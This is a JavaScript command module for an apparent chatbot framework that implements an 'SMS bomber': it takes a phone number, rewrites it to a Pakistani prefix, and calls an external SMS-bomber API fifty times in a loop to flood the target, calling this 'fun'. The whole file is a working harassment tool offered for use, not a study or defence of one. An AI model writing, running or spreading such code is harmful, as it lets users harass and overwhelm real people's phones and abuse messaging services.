// lodash-pari/commands/bomber.js
const axios = require("axios");

module.exports = {
  config: {
cooldowns: 10,
premium: false,
permission: 0,
    name: "bomber",
    aliases: ['bomb'],
    version: "1.0.0",
    credits: "CHAND",
    description: "Fun SMS bomber (50 messages max per request)",
    prefix: true,
    category: "system",
    usage: "bomber <number>"
  },

  async run({ api, event, args, send }) {
    const number = args[0];
    if (!number) {
      return send.reply(`━❮🐉❯━━━❪💝❫━━━❮🐉❯━\n\n📱 🅟𝐥𝐞𝐚𝐬𝐞 𝐞𝐧𝐭𝐞𝐫 𝐚 𝐦𝐨𝐛𝐢𝐥𝐞 𝐧𝐮𝐦𝐛𝐞𝐫!\n\n🔰 🅔𝐱𝐚𝐦𝐩𝐥𝐞: 𝐛𝐨𝐦𝐛𝐞𝐫 0345XXXXXXX \n\n━❮🐉❯━━━❪💝❫━━━❮🐉❯━`);
    }

    const target = number.startsWith("92") ? number : number.replace(/^0/, "92");

    try {
      let success = 0;
      const limit = 50;

      for (let i = 0; i < limit; i++) {
        const res = await axios.get(`https://shadowscriptz.xyz/public_apis/smsbomberapi.php?num=${target}`);
        if (res.data) success++;
      }

      const message = `✨━━━━━━━━━━━━━━━━━━✨\n\n💣 SMS BOMBER Started! 💣\n📱 Target Number: ${number}\n✅ Messages Sent: ${success} / ${limit}\n\n⚠️ Note: Limit is 50 messages per request.\n✨━━━━━━━━━━━━━━━━━━✨`;

      return send.reply(message.trim());
    } catch (err) {
      console.error(err);
      return send.reply(`━❮🐉❯━━━❪💝❫━━━❮🐉❯━\n🅔𝐫𝐫𝐨𝐫 𝐃𝐮𝐫𝐢𝐧𝐠 𝐒𝐌𝐒 𝐒𝐞𝐧𝐝𝐢𝐧𝐠! ⚠️ 𝐏𝐥𝐞𝐚𝐬𝐞 𝐜𝐡𝐞𝐜𝐤 𝐭𝐡𝐞 𝐧𝐮𝐦𝐛𝐞𝐫 𝐨𝐫\n𝐓𝐫𝐲 𝐀𝐠𝐚𝐢𝐧 𝐋𝐚𝐭𝐞𝐫.\n━❮🐉❯━━━❪💝❫━━━❮🐉❯━`);
    }
  }
};
